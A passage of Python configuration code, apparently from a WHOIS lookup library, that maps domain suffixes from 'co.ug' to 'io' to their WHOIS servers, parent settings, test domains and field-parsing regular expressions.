\"rw\"}\nZZ[\"co.ug\"] = {\"extend\": \"ug\"}\nZZ[\"country\"] = {\"_server\": \"whois.nic.country\", \"extend\": \"com\", \"_test\": \"nic.country\"}\nZZ[\"coupons\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"courses\"] = {\"extend\": \"com\"}\nZZ[\"co.ve\"] = {\"extend\": \"ve\"}\nZZ[\"co.za\"] = {\"extend\": \"za\", \"_server\": \"coza-whois.registry.net.za\"}\nZZ[\"cpa\"] = {\"_server\": \"whois.nic.cpa\", \"extend\": \"com\", \"_test\": \"nic.cpa\"}\nZZ[\"creditcard\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"credit\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"creditunion\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\n\nZZ[\"cr\"] = {\"extend\": \"cz\"}\nZZ[\"co.cr\"] = {\"extend\": \"cr\"}\n\nZZ[\"cricket\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.cricket\", \"_test\": \"nic.cricket\"}\nZZ[\"cruise\"] = {\"_server\": \"whois.nic.cruise\", \"extend\": \"com\", \"_test\": \"nic.cruise\"}\nZZ[\"cruises\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"cuisinella\"] = {\"_server\": \"whois.nic.cuisinella\", \"extend\": \"com\", \"_test\": \"nic.cuisinella\"}\nZZ[\"cv\"] = {\"extend\": \"_privateReg\"} # Cape Verde\nZZ[\"cw\"] = {\"extend\": \"_privateReg\"}\nZZ[\"cx\"] = {\"extend\": \"com\"}\nZZ[\"cymru\"] = {\"_server\": \"whois.nic.cymru\", \"extend\": \"com\", \"_test\": \"nic.cymru\"}\nZZ[\"cyou\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"cy\"] = {\"_privateRegistry\": True}\nZZ[\"dabur\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"dad\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.google\"}\nZZ[\"dance\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"data\"] = {\"_server\": \"whois.nic.data\", \"extend\": \"com\", 
\"_test\": \"nic.data\"}\nZZ[\"date\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.date\", \"_test\": \"nic.date\"}\nZZ[\"dating\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"datsun\"] = {\"_server\": \"whois.nic.gmo\", \"extend\": \"com\"}\nZZ[\"day\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"dclk\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"dds\"] = {\"_server\": \"whois.nic.dds\", \"extend\": \"com\", \"_test\": \"nic.dds\"}\nZZ[\"dealer\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"deal\"] = {\"_server\": \"whois.nic.deal\", \"extend\": \"com\", \"_test\": \"nic.deal\"}\nZZ[\"deals\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"degree\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"delivery\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"deloitte\"] = {\"_server\": \"whois.nic.deloitte\", \"extend\": \"com\", \"_test\": \"nic.deloitte\"}\nZZ[\"delta\"] = {\"_server\": \"whois.nic.delta\", \"extend\": \"com\", \"_test\": \"nic.delta\"}\nZZ[\"democrat\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"dental\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"dentist\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"desi\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"design\"] = {\"extend\": \"ac\"}\nZZ[\"dev\"] = {\"extend\": \"com\"}\nZZ[\"diamonds\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"diet\"] = {\"extend\": \"_uniregistry\", \"_server\": \"whois.uniregistry.net\"}\nZZ[\"digital\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"direct\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"directory\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"discount\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"dish\"] = {\"_server\": \"whois.nic.dish\", \"extend\": \"com\", \"_test\": \"nic.dish\"}\nZZ[\"diy\"] = {\"_server\": \"whois.nic.diy\", \"extend\": \"com\", \"_test\": \"nic.diy\"}\nZZ[\"dm\"] = {\"_server\": \"whois.dmdomains.dm\", \"extend\": \"com\"}\nZZ[\"dnp\"] = {\"_server\": \"whois.nic.dnp\", \"extend\": \"com\", \"_test\": \"nic.dnp\"}\nZZ[\"docs\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"doctor\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"do\"] = {\"extend\": \"bzh\", \"_server\": \"whois.nic.do\", \"_test\": \"nic.do\"}\nZZ[\"do\"] = {\"extend\": \"_privateReg\"}\nZZ[\"dog\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"domains\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"dot\"] = {\"_server\": \"whois.nic.dot\", \"extend\": \"com\", \"_test\": \"nic.dot\"}\nZZ[\"download\"] = {\"extend\": \"amsterdam\", \"name_servers\": R(r\"Name Server:[ \\t]+(\\S+)\"), \"status\": R(r\"Domain Status:\\s*([a-zA-z]+)\")}\nZZ[\"drive\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"dtv\"] = {\"_server\": \"whois.nic.dtv\", \"extend\": \"com\", \"_test\": \"nic.dtv\"}\nZZ[\"dubai\"] = {\"_server\": \"whois.nic.dubai\", \"extend\": \"com\", \"_test\": \"nic.dubai\"}\nZZ[\"duckdns.org\"] = {\"extend\": \"_privateReg\"}\nZZ[\"dunlop\"] = {\"_server\": \"whois.nic.dunlop\", \"extend\": \"com\", \"_test\": \"nic.dunlop\"}\nZZ[\"durban\"] = {\"_server\": \"whois.nic.durban\", \"extend\": \"com\", 
\"_test\": \"nic.durban\"}\nZZ[\"dvag\"] = {\"_server\": \"whois.nic.dvag\", \"extend\": \"com\", \"_test\": \"nic.dvag\"}\nZZ[\"dvr\"] = {\"_server\": \"whois.nic.dvr\", \"extend\": \"com\", \"_test\": \"nic.dvr\"}\nZZ[\"dz\"] = {\"extend\": \"_privateReg\"}\nZZ[\"earth\"] = {\"_server\": \"whois.nic.earth\", \"extend\": \"com\", \"_test\": \"nic.earth\"}\nZZ[\"eat\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"ec\"] = {\"extend\": \"_privateReg\"}\nZZ[\"eco\"] = {\"_server\": \"whois.nic.eco\", \"extend\": \"com\", \"_test\": \"nic.eco\"}\nZZ[\"edeka\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"ed.jp\"] = {\"extend\": \"co.jp\"}\nZZ[\"education\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"edu.tr\"] = {\"extend\": \"com.tr\", \"_server\": \"whois.trabis.gov.tr\", \"_test\": \"anadolu.edu.tr\"}\nZZ[\"edu.ua\"] = {\"extend\": \"ua\", \"creation_date\": R(r\"\\ncreated:\\s+0-UANIC\\s+(.+)\")}\nZZ[\"eg\"] = {\"extend\": \"_privateReg\"} # Egipt\nZZ[\"email\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"emerck\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"energy\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"engineer\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"engineering\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"enterprises\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"epson\"] = {\"_server\": \"whois.nic.epson\", \"extend\": \"com\", \"_test\": \"nic.epson\"}\nZZ[\"equipment\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"ericsson\"] = {\"_server\": \"whois.nic.ericsson\", \"extend\": \"com\", \"_test\": \"nic.ericsson\"}\nZZ[\"erni\"] = {\"_server\": \"whois.nic.erni\", \"extend\": \"com\", \"_test\": \"nic.erni\"}\nZZ[\"es\"] = {\"extend\": \"_privateReg\"}\nZZ[\"esq\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.google\"}\nZZ[\"estate\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"et\"] = {\"extend\": \"com\", \"_server\": \"whois.ethiotelecom.et\"}\nZZ[\"com.et\"] = {\"extend\": \"et\", \"_test\": \"google.com.et\"}\nZZ[\"etisalat\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"eurovision\"] = {\"_server\": \"whois.nic.eurovision\", \"extend\": \"com\", \"_test\": \"nic.eurovision\"}\nZZ[\"eus\"] = {\"extend\": \"ac\"}\nZZ[\"events\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"exchange\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"expert\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"exposed\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"express\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"extraspace\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"fage\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"fail\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"fairwinds\"] = {\"_server\": \"whois.nic.fairwinds\", \"extend\": \"com\", \"_test\": \"nic.fairwinds\"}\nZZ[\"faith\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.faith\", \"_test\": \"nic.faith\"}\nZZ[\"family\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"fan\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"fans\"] = {\"extend\": \"_centralnic\", \"_server\": 
\"whois.centralnic.com\"}\nZZ[\"farm\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"fashion\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.fashion\", \"_test\": \"nic.fashion\"}\nZZ[\"fast\"] = {\"_server\": \"whois.nic.fast\", \"extend\": \"com\", \"_test\": \"nic.fast\"}\nZZ[\"fedex\"] = {\"_server\": \"whois.nic.fedex\", \"extend\": \"com\", \"_test\": \"nic.fedex\"}\nZZ[\"feedback\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"ferrari\"] = {\"_server\": \"whois.nic.ferrari\", \"extend\": \"com\", \"_test\": \"nic.ferrari\"}\nZZ[\"fidelity\"] = {\"_server\": \"whois.nic.fidelity\", \"extend\": \"com\", \"_test\": \"nic.fidelity\"}\nZZ[\"fido\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"film\"] = {\"_server\": \"whois.nic.film\", \"extend\": \"com\", \"_test\": \"nic.film\"}\nZZ[\"final\"] = {\"_server\": \"whois.gtlds.nic.br\", \"extend\": \"bom\"}\nZZ[\"finance\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"financial\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"fire\"] = {\"_server\": \"whois.nic.fire\", \"extend\": \"com\", \"_test\": \"nic.fire\"}\nZZ[\"firestone\"] = {\"_server\": \"whois.nic.firestone\", \"extend\": \"com\", \"_test\": \"nic.firestone\"}\nZZ[\"firmdale\"] = {\"_server\": \"whois.nic.firmdale\", \"extend\": \"com\", \"_test\": \"nic.firmdale\"}\nZZ[\"fish\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"fishing\"] = {\"_server\": \"whois.nic.fishing\", \"extend\": \"com\", \"_test\": \"nic.fishing\"}\nZZ[\"fit\"] = {\"extend\": \"com\"}\nZZ[\"fitness\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"flights\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"florist\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"flowers\"] = {\"extend\": \"_uniregistry\", \"_server\": \"whois.uniregistry.net\"}\nZZ[\"fly\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"fm\"] = {\"extend\": \"com\"}\nZZ[\"fo\"] = {\"extend\": \"com\", \"registrant\": None}\nZZ[\"foo\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.google\"}\nZZ[\"football\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"forex\"] = {\"_server\": \"whois.nic.forex\", \"extend\": \"com\", \"_test\": \"nic.forex\"}\nZZ[\"forsale\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"forum\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"foundation\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.nic.foundation\", \"_test\": \"nic.foundation\"}\nZZ[\"fox\"] = {\"_server\": \"whois.nic.fox\", \"extend\": \"com\", \"_test\": \"nic.fox\"}\nZZ[\"free\"] = {\"_server\": \"whois.nic.free\", \"extend\": \"com\", \"_test\": \"nic.free\"}\nZZ[\"fresenius\"] = {\"_server\": \"whois.nic.fresenius\", \"extend\": \"com\", \"_test\": \"nic.fresenius\"}\nZZ[\"frl\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"frogans\"] = {\"_server\": \"whois.nic.frogans\", \"extend\": \"com\", \"_test\": \"nic.frogans\"}\nZZ[\"frontdoor\"] = {\"_server\": \"whois.nic.frontdoor\", \"extend\": \"com\", \"_test\": \"nic.frontdoor\"}\nZZ[\"fujitsu\"] = {\"_server\": \"whois.nic.gmo\", \"extend\": \"com\"}\nZZ[\"fund\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"fun\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"furniture\"] = {\"extend\": \"_donuts\", 
\"_server\": \"whois.donuts.co\"}\nZZ[\"futbol\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"fyi\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"ga\"] = {\"extend\": \"_privateReg\"}\nZZ[\"gallery\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"gallo\"] = {\"_server\": \"whois.nic.gallo\", \"extend\": \"com\", \"_test\": \"nic.gallo\"}\nZZ[\"gallup\"] = {\"_server\": \"whois.nic.gallup\", \"extend\": \"com\", \"_test\": \"nic.gallup\"}\nZZ[\"gal\"] = {\"_server\": \"whois.nic.gal\", \"extend\": \"com\", \"_test\": \"nic.gal\"}\nZZ[\"game\"] = {\"extend\": \"amsterdam\"}\nZZ[\"games\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"garden\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.garden\", \"_test\": \"nic.garden\"}\nZZ[\"gay\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.gay\", \"_test\": \"nic.gay\"}\nZZ[\"gbiz\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"gd\"] = {\"extend\": \"com\"}\nZZ[\"gdn\"] = {\"_server\": \"whois.nic.gdn\", \"extend\": \"com\", \"_test\": \"nic.gdn\"}\nZZ[\"gea\"] = {\"_server\": \"whois.nic.gea\", \"extend\": \"com\", \"_test\": \"nic.gea\"}\nZZ[\"gent\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"genting\"] = {\"_server\": \"whois.nic.genting\", \"extend\": \"com\", \"_test\": \"nic.genting\"}\nZZ[\"geo.jp\"] = {\"extend\": \"co.jp\"}\nZZ[\"george\"] = {\"_server\": \"whois.nic.george\", \"extend\": \"com\", \"_test\": \"nic.george\"}\nZZ[\"ge\"] = {\"_server\": \"whois.nic.ge\", \"extend\": \"ac\", \"updated_date\": None, \"_test\": \"nic.ge\", \"registrant\": R(r\"Registrant:\\s*([^\\n]*)\\n\")}\nZZ[\"gf\"] = {\"extend\": \"si\", \"_server\": \"whois.mediaserv.net\"}\nZZ[\"ggee\"] = {\"_server\": \"whois.nic.ggee\", \"extend\": \"com\", \"_test\": \"nic.ggee\"}\nZZ[\"gh\"] = {\"_privateRegistry\": True}\nZZ[\"gift\"] = {\"extend\": \"_uniregistry\", \"_server\": \"whois.uniregistry.net\"}\nZZ[\"gifts\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"gi\"] = {\"_server\": \"whois2.afilias-grs.net\", \"extend\": \"com\"}\nZZ[\"gives\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"giving\"] = {\"_server\": \"whois.nic.giving\", \"extend\": \"com\", \"_test\": \"nic.giving\"}\nZZ[\"glass\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"gle\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"global\"] = {\"extend\": \"amsterdam\", \"name_servers\": R(r\"Name Server: (.+)\")}\nZZ[\"globo\"] = {\"_server\": \"whois.gtlds.nic.br\", \"extend\": \"bom\"}\nZZ[\"gl\"] = {\"_server\": \"whois.nic.gl\", \"extend\": \"com\", \"_test\": \"nic.gl\"}\nZZ[\"gmail\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"gmbh\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"gmo\"] = {\"_server\": \"whois.nic.gmo\", \"extend\": \"com\", \"_test\": \"nic.gmo\"}\nZZ[\"gmx\"] = {\"_server\": \"whois.nic.gmx\", \"extend\": \"com\", \"_test\": \"nic.gmx\"}\nZZ[\"gob.ec\"] = {\"extend\": \"ec\"}\nZZ[\"godaddy\"] = {\"_server\": \"whois.nic.godaddy\", \"extend\": \"com\", \"_test\": \"nic.godaddy\"}\nZZ[\"go.jp\"] = {\"extend\": \"co.jp\"}\nZZ[\"go.ke\"] = {\"extend\": \"ke\"}\nZZ[\"gold\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"goldpoint\"] = {\"_server\": \"whois.nic.goldpoint\", \"extend\": \"com\", \"_test\": \"nic.goldpoint\"}\nZZ[\"golf\"] = {\"extend\": \"_donuts\", \"_server\": 
\"whois.donuts.co\"}\nZZ[\"goodyear\"] = {\"_server\": \"whois.nic.goodyear\", \"extend\": \"com\", \"_test\": \"nic.goodyear\"}\nZZ[\"google\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\", \"_test\": \"nic.google\"}\nZZ[\"goog\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"goo\"] = {\"_server\": \"whois.nic.gmo\", \"extend\": \"com\"}\nZZ[\"gop\"] = {\"_server\": \"whois.nic.gop\", \"extend\": \"com\", \"_test\": \"nic.gop\"}\nZZ[\"go.th\"] = {\"extend\": \"co.th\"}\nZZ[\"got\"] = {\"_server\": \"whois.nic.got\", \"extend\": \"com\", \"_test\": \"nic.got\"}\nZZ[\"gov.bd\"] = {\"extend\": \"bd\"}\nZZ[\"gov\"] = {\"extend\": \"com\"}\nZZ[\"gov.rw\"] = {\"extend\": \"rw\"}\nZZ[\"gov.tr\"] = {\"extend\": \"com.tr\", \"_server\": \"whois.trabis.gov.tr\", \"_test\": \"www.turkiye.gov.tr\"}\nZZ[\"gov.uk\"] = {\"extend\": \"ac.uk\"}\nZZ[\"gq\"] = {\"extend\": \"ml\", \"_server\": \"whois.domino.gq\"}\nZZ[\"graphics\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"gratis\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"green\"] = {\"extend\": \"com\"}\nZZ[\"gr\"] = {\"extend\": \"_privateReg\"}\nZZ[\"gripe\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"gr.jp\"] = {\"extend\": \"co.jp\"}\nZZ[\"group\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"gs\"] = {\"_server\": \"whois.nic.gs\", \"extend\": \"com\", \"_test\": \"nic.gs\"}\nZZ[\"gt\"] = {\"extend\": \"_privateReg\"}\nZZ[\"gucci\"] = {\"_server\": \"whois.nic.gucci\", \"extend\": \"com\", \"_test\": \"nic.gucci\"}\nZZ[\"guge\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"guide\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"guitars\"] = {\"extend\": \"_uniregistry\", \"_server\": \"whois.uniregistry.net\"}\nZZ[\"guru\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"gy\"] = {\"extend\": \"com\"}\nZZ[\"hair\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"hamburg\"] = {\"_server\": \"whois.nic.hamburg\", \"extend\": \"com\", \"_test\": \"nic.hamburg\"}\nZZ[\"hangout\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"haus\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"hdfcbank\"] = {\"_server\": \"whois.nic.hdfcbank\", \"extend\": \"com\", \"_test\": \"nic.hdfcbank\"}\nZZ[\"hdfc\"] = {\"_server\": \"whois.nic.hdfc\", \"extend\": \"com\", \"_test\": \"nic.hdfc\"}\nZZ[\"healthcare\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"health\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.health\", \"_test\": \"nic.health\"}\nZZ[\"help\"] = {\"extend\": \"_uniregistry\", \"_server\": \"whois.uniregistry.net\"}\nZZ[\"helsinki\"] = {\"_server\": \"whois.nic.helsinki\", \"extend\": \"com\", \"_test\": \"nic.helsinki\"}\nZZ[\"here\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"hermes\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"hiphop\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.hiphop\", \"_test\": \"nic.hiphop\"}\nZZ[\"hisamitsu\"] = {\"_server\": \"whois.nic.gmo\", \"extend\": \"com\"}\nZZ[\"hitachi\"] = {\"_server\": \"whois.nic.gmo\", \"extend\": \"com\"}\nZZ[\"hiv\"] = {\"_server\": \"whois.nic.hiv\", \"extend\": \"com\", \"_test\": \"nic.hiv\"}\nZZ[\"hkt\"] = {\"_server\": \"whois.nic.hkt\", \"extend\": \"com\", \"_test\": \"nic.hkt\"}\nZZ[\"hn\"] = {\"extend\": \"com\"} # Honduras\nZZ[\"hockey\"] = {\"extend\": 
\"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"holdings\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"holiday\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"homedepot\"] = {\"_server\": \"whois.nic.homedepot\", \"extend\": \"com\", \"_test\": \"nic.homedepot\"}\nZZ[\"homes\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"honda\"] = {\"_server\": \"whois.nic.honda\", \"extend\": \"com\", \"_test\": \"nic.honda\"}\nZZ[\"hopto.org\"] = {\"extend\": \"_privateReg\"} # dynamic dns without any whois\nZZ[\"horse\"] = {\"_server\": \"whois.nic.horse\", \"extend\": \"com\", \"_test\": \"nic.horse\"}\nZZ[\"hospital\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"host\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"hosting\"] = {\"extend\": \"_uniregistry\", \"_server\": \"whois.uniregistry.net\"}\nZZ[\"hot\"] = {\"_server\": \"whois.nic.hot\", \"extend\": \"com\", \"_test\": \"nic.hot\"}\nZZ[\"house\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"how\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"ht\"] = {\"_server\": \"whois.nic.ht\", \"extend\": \"com\", \"_test\": \"nic.ht\"}\nZZ[\"hu\"] = {\"extend\": \"_privateReg\"}\nZZ[\"hughes\"] = {\"_server\": \"whois.nic.hughes\", \"extend\": \"com\", \"_test\": \"nic.hughes\"}\nZZ[\"hyundai\"] = {\"_server\": \"whois.nic.hyundai\", \"extend\": \"com\", \"_test\": \"nic.hyundai\"}\nZZ[\"ibm\"] = {\"_server\": \"whois.nic.ibm\", \"extend\": \"com\", \"_test\": \"nic.ibm\"}\nZZ[\"icbc\"] = {\"_server\": \"whois.nic.icbc\", \"extend\": \"com\", \"_test\": \"nic.icbc\"}\nZZ[\"ice\"] = {\"_server\": \"whois.nic.ice\", \"extend\": \"com\", \"_test\": \"nic.ice\"}\nZZ[\"icu\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"ie\"] = {\"extend\": \"com\"} # Ireland\nZZ[\"ifm\"] = {\"_server\": \"whois.nic.ifm\", \"extend\": \"com\", \"_test\": \"nic.ifm\"}\nZZ[\"ikano\"] = {\"_server\": \"whois.nic.ikano\", \"extend\": \"com\", \"_test\": \"nic.ikano\"}\nZZ[\"imamat\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"imdb\"] = {\"_server\": \"whois.nic.imdb\", \"extend\": \"com\", \"_test\": \"nic.imdb\"}\nZZ[\"immobilien\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"immo\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"inc\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"industries\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"in\"] = {\"extend\": \"com\", \"_server\": \"whois.registry.in\"}\nZZ[\"infiniti\"] = {\"_server\": \"whois.nic.gmo\", \"extend\": \"com\"}\nZZ[\"info\"] = {\"extend\": \"com\"}\nZZ[\"info.ke\"] = {\"extend\": \"ke\"}\nZZ[\"info.ve\"] = {\"extend\": \"ve\"}\nZZ[\"ing\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"ink\"] = {\"extend\": \"amsterdam\"}\nZZ[\"institute\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"insurance\"] = {\"_server\": \"whois.nic.insurance\", \"extend\": \"com\", \"_test\": \"nic.insurance\"}\nZZ[\"insure\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"international\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"in.th\"] = {\"extend\": \"co.th\"}\nZZ[\"investments\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"io\"] = {\"extend\": \"com\", \"expiration_date\": 
